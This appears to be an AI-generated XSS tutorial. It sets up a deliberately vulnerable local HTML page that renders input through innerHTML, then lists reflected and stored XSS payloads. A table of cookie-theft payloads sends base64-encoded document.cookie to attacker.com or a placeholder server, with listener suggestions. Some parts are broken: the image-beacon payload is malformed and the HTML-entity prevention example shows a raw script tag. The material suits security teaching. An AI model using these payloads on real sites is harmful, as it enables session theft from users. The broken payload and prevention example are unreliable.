Xss
## Local POC Setup
Save the code below as `xss-poc.html` and open it in a browser. Set a test cookie via developer tools (Application > Cookies > add `session=abc123`). This simulates the /login error page and a stored comments section.[3]
```html
<!DOCTYPE html>
<html>
<head><title>XSS POC Demo</title></head>
<body>
<h2>Reflected XSS (/login simulation)</h2>
<form>
<input id="error" placeholder="Enter param for reflection">
<button onclick="reflect()">Submit</button>
</form>
<div id="reflected"></div>
<h2>Stored XSS (Comments)</h2>
<input id="comment" placeholder="Enter comment">
<button onclick="store()">Post Comment</button>
<div id="comments"></div>
<script>
let comments = JSON.parse(localStorage.getItem('comments')) || [];
function reflect() {
const param = document.getElementById('error').value;
document.getElementById('reflected').innerHTML = `Login error: ${param}`;
}
function store() {
const input = document.getElementById('comment').value;
comments.push(input);
localStorage.setItem('comments', JSON.stringify(comments));
displayComments();
}
function displayComments() {
const div = document.getElementById('comments');
div.innerHTML = comments.map(c => `<p>${c}</p>`).join('');
}
displayComments();
</script>
</body>
</html>
```
## Test Reflected XSS
Enter `<img src=x onerror=alert('Reflected XSS')>` in the reflected input and submit. The payload executes immediately, simulating URL parameter injection on /login.[3][4]
## Test Stored XSS
Enter `<script>fetch('https://your-server.com/?c='+btoa(document.cookie))</script>` in comments and post. Refresh the page; the payload persists and "steals" cookies to your specified endpoint on every load.[1][2]
## Cookie Theft Payloads
Replace `https://your-server.com` with a listener like http://requestbin.com or ngrok for testing.
| Type | Payload Example |
|------|-----------------|
| Basic Alert | `<img src=x onerror=alert(document.cookie)>` [3] |
| Fetch Cookie | `<script>fetch('https://attacker.com/?c='+btoa(document.cookie))</script>` [2] |
| Image Beacon | `<img src="https://attacker.com/?c=`+btoa(document.cookie)>` [web:10] |
## Prevention Tips
Encode outputs with HTML entities (e.g., `<script>`), use Content Security Policy, and sanitize inputs server-side. Test with tools like OWASP ZAP for your web dev projects.[5][6]
Citations:
[1] Lab: Exploiting cross-site scripting to steal cookies https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies
[2] How can stored XSS vulnerability lead to cookie stealing? https://www.linkedin.com/pulse/how-can-stored-xss-vulnerability-lead-cookie-stealing-motasem-hamdan-fo4vf
[3] reflected XSS - Cross-site scripting https://portswigger.net/web-security/cross-site-scripting/reflected
[4] Testing for Reflective XSS https://www.cobalt.io/blog/testing-for-reflective-xss
[5] Cross-site scripting (XSS) - Security | MDN https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/XSS
[6] Trusted Types Demo - Modern XSS Prevention for Web Security https://www.trustedtypesdemo.com
[8] Stored XSS and stealing session cookies https://www.hakatemia.fi/en/courses/xss-cross-site-scripting/stored-xss-injection-and-stealing-cookies
[9] Cross Site Scripting (XSS) Exploit Paths - DevCentral - F5 https://community.f5.com/kb/technicalarticles/cross-site-scripting-xss-exploit-paths/275166
[10] How Can Stored XSS Vulnerability Lead to Cookie Stealing? Practical Training Scenario https://www.youtube.com/watch?v=G1HXWcKz7_E
[11] Reflected XSS via ref parameter on login https://www.bugbountyhunter.com/hackevents/report?id=267
[12] Cookie Stealing with XSS https://jamesonhacking.blogspot.com/2018/08/cookie-stealing-with-xss.html
[13] XSS Demo https://xss.benstafford.dev
[14] Cookie Hijacking https://www.invicti.com/learn/cookie-hijacking
[15] Cross Site Scripting (XSS) https://owasp.org/www-community/attacks/xss/
[16] practical XSS attack scenarios... https://pentest-tools.com/blog/xss-attacks-practical-scenarios
[17] Sanitizing Inputs https://brightsec.com/blog/reflected-xss/